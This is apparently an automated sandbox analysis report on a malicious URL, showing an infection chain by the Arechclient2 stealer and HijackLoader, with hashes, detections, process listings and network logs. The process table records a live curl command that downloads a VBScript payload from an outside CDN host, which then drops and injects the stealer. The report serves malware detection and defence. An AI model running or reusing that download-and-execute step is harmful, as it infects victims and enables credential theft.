URL:

www.crashnotify.org/4KpraPV2

Full analysis: https://app.any.run/tasks/34b7356a-bf4d-4bdb-905e-7d3b5ff2dad4
Verdict: Malicious activity
Threats:

The Arechclient2 malware is a sophisticated .NET-based Remote Access Trojan (RAT) that collects sensitive information, such as browser credentials, from infected computers. It employs various stealth techniques, including Base64 encoding to obscure its code and the ability to pause activities to evade automated security tools. The malware also can adjust Windows Defender settings and uses code injection to manipulate legitimate processes.

Malware Trends Tracker     >>>
Analysis date: July 17, 2025, 20:12:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
auto
generic
stealer
teapotstealer
arechclient2
backdoor
rat
hijackloader
loader
xor-url
Indicators:
MD5:

281FB1AD58687C2E533421E47A77C751

SHA1:

79C095D7D274BD5B990E536CCD46475727AEAEAF

SHA256:

5256A9928D1829D34B67851ADF17E1F81CB28D57FDAC987E89FA434501B6A557

SSDEEP:

3:EE+aG9U:rpG9U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7704)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7704)

    • Checks whether a specified folder exists (SCRIPT)

      • wscript.exe (PID: 7704)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7704)

    • Gets %appdata% folder path (SCRIPT)

      • wscript.exe (PID: 7704)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 7704)

    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 7704)

    • Creates a new folder (SCRIPT)

      • wscript.exe (PID: 7704)

    • GENERIC has been found (auto)

      • Ente_Elec.exe (PID: 5812)

    • Executing a file with an untrusted certificate

      • DelModule86.exe (PID: 3488)
      • XPFix.exe (PID: 8016)

    • TEAPOT has been detected

      • RegAsm.exe (PID: 684)

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 684)

    • ARECHCLIENT2 has been detected (YARA)

      • RegAsm.exe (PID: 684)

    • HIJACKLOADER has been detected (YARA)

      • Ente_Elec.exe (PID: 5812)

    • XORed URL has been found (YARA)

      • RegAsm.exe (PID: 684)

    • ARECHCLIENT2 has been detected (SURICATA)

      • RegAsm.exe (PID: 684)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7764)

    • Application launched itself

      • cmd.exe (PID: 7764)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7704)

    • The process executes VB scripts

      • cmd.exe (PID: 7764)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 7704)

    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 7704)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 7704)

    • Creates a Folder object (SCRIPT)

      • wscript.exe (PID: 7704)

    • Process drops legitimate windows executable

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)

    • Executable content was dropped or overwritten

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7704)

    • The process drops C-runtime libraries

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)

    • Starts itself from another location

      • Ente_Elec.exe (PID: 7132)

    • Connects to unusual port

      • RegAsm.exe (PID: 684)

    • Searches for installed software

      • RegAsm.exe (PID: 684)

    • Reads the date of Windows installation

      • DelModule86.exe (PID: 3488)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 2976)
      • chrome.exe (PID: 5928)
      • chrome.exe (PID: 7508)
      • chrome.exe (PID: 4680)
      • msedge.exe (PID: 7676)
      • chrome.exe (PID: 7580)
      • chrome.exe (PID: 7856)
      • chrome.exe (PID: 1480)
      • msedge.exe (PID: 6676)
      • msedge.exe (PID: 8432)
      • msedge.exe (PID: 7056)
      • msedge.exe (PID: 7364)
      • msedge.exe (PID: 2356)

    • Checks supported languages

      • identity_helper.exe (PID: 7640)
      • curl.exe (PID: 1336)
      • Update.exe (PID: 7732)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)

    • Reads the computer name

      • identity_helper.exe (PID: 7640)
      • curl.exe (PID: 1336)
      • Update.exe (PID: 7732)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)

    • Reads Environment values

      • identity_helper.exe (PID: 7640)
      • RegAsm.exe (PID: 684)

    • Manual execution by a user

      • cmd.exe (PID: 7764)

    • Execution of CURL command

      • cmd.exe (PID: 7764)

    • Create files in a temporary directory

      • curl.exe (PID: 1336)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)

    • Checks proxy server information

      • wscript.exe (PID: 7704)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)
      • slui.exe (PID: 7972)

    • The sample compiled with english language support

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)

    • Creates files in the program directory

      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)

    • Reads the machine GUID from the registry

      • Update.exe (PID: 7732)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)

    • Creates files or folders in the user directory

      • Ente_Elec.exe (PID: 5812)

    • The sample compiled with chinese language support

      • Ente_Elec.exe (PID: 5812)

    • Reads product name

      • RegAsm.exe (PID: 684)

    • Disables trace logs

      • RegAsm.exe (PID: 684)

    • Reads the software policy settings

      • DelModule86.exe (PID: 3488)
      • slui.exe (PID: 7972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

xor-url

(PID) Process(684) RegAsm.exe
Decrypted-URLs (14)http://dl.google.com/chrome/install/375.126/chrome_installer.exe
https://bsc-dataseed1.binance.org/
https://bsc-dataseed1.defibit.io/?
https://bsc-dataseed1.ninicoin.io/E
https://bsc-dataseed2.binance.org/
https://bsc-dataseed2.defibit.io/
https://bsc-dataseed2.ninicoin.io/L
https://bsc-dataseed3.binance.org/z
https://bsc-dataseed3.defibit.io/1
https://bsc-dataseed3.ninicoin.io/B
https://bsc-dataseed4.binance.org/_@Vq'
https://bsc-dataseed4.defibit.io/
https://bsc-dataseed4.ninicoin.io/wX:
https://github.com
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
391
Monitored processes
241
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs cmd.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe msedge.exe no specs msedge.exe no specs cmd.exe no specs msedge.exe no specs curl.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs wscript.exe update.exe no specs ente_elec.exe #GENERIC ente_elec.exe msedge.exe no specs #ARECHCLIENT2 regasm.exe chrome.exe chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs delmodule86.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs msedge.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs xpfix.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
536"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\vzidxzrt.qno" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=3716,i,4724139898744864779,7694668970961475985,262144 --variations-seed-version --mojo-platform-channel-handle=4144 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Update.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
xor-url
(PID) Process(684) RegAsm.exe
Decrypted-URLs (14)http://dl.google.com/chrome/install/375.126/chrome_installer.exe
https://bsc-dataseed1.binance.org/
https://bsc-dataseed1.defibit.io/?
https://bsc-dataseed1.ninicoin.io/E
https://bsc-dataseed2.binance.org/
https://bsc-dataseed2.defibit.io/
https://bsc-dataseed2.ninicoin.io/L
https://bsc-dataseed3.binance.org/z
https://bsc-dataseed3.defibit.io/1
https://bsc-dataseed3.ninicoin.io/B
https://bsc-dataseed4.binance.org/_@Vq'
https://bsc-dataseed4.defibit.io/
https://bsc-dataseed4.ninicoin.io/wX:
https://github.com
828"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5488,i,12469882710374697201,17715989984810711768,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1156"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=4288,i,2099613050972961947,5883793109786222923,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1156"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\h0oc1iuq.qb5" --always-read-main-dll --field-trial-handle=2592,i,6856007942761450023,10968364751178475654,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1160"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3632,i,12469882710374697201,17715989984810711768,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1216"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=4216,i,2099613050972961947,5883793109786222923,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1216"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\cycea4ts.twt" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3132,i,12025552505710583791,14017146673815780957,262144 --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1336curl -k -o C:\Users\admin\AppData\Local\Temp\\setup.vbs https://figg.b-cdn.net/setup.vbs C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
1388"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\cfo4bcd2.dsm" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3100,i,14203269924794428368,488048664498352189,262144 --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
34 851
Read events
34 730
Write events
120
Delete events
1

Modification events

(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(2976) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
E52A5BEABB982F00
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\656180
Operation:writeName:WindowTabManagerFileMappingId
Value:
{0518BE18-4115-41E0-A66E-E3101BE51057}
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\656180
Operation:writeName:WindowTabManagerFileMappingId
Value:
{E2E15FAD-77F8-488F-AE5C-B7554A5C2A82}
(PID) Process:(2976) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
C95F99EABB982F00
(PID) Process:(2976) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Operation:writeName:Enabled
Value:
0
Executable files
28
Suspicious files
718
Text files
345
Unknown types
380

Dropped files

PID
Process
Filename
Type
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RF18cd9c.TMP
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF18cdbb.TMP
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF18cdda.TMP
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF18cdf9.TMP
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF18ce09.TMP
MD5:
SHA256:
2976msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
45
TCP/UDP connections
139
DNS requests
146
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2112
msedge.exe
GET
200
150.171.28.11:80
http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:6MEnVZ9U3rppIne7SM5hhzqpOxlTV1hapBRoOja8Gzk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7276
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7276
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
8056
svchost.exe
HEAD
200
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bf8090eb-6e5c-4c51-9250-5bf9b46cf160?P1=1753191227&P2=404&P3=2&P4=K%2bCXE%2f4Q1Lb0e%2bPcnMNyq5fSQzfazp6FI3R1AplCKvIwIpdcurLr9Q2%2bS7n04Aa%2fFCon3FGD6nAMi9jwZJE5oA%3d%3d
unknown
whitelisted
8056
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bf8090eb-6e5c-4c51-9250-5bf9b46cf160?P1=1753191227&P2=404&P3=2&P4=K%2bCXE%2f4Q1Lb0e%2bPcnMNyq5fSQzfazp6FI3R1AplCKvIwIpdcurLr9Q2%2bS7n04Aa%2fFCon3FGD6nAMi9jwZJE5oA%3d%3d
unknown
whitelisted
7704
wscript.exe
GET
200
142.250.186.99:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
7704
wscript.exe
GET
200
172.64.149.23:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
whitelisted
7704
wscript.exe
GET
200
104.18.38.233:80
http://ocsp.sectigo.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEDIJNp8i8WsBCf5KFrBaGFM%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
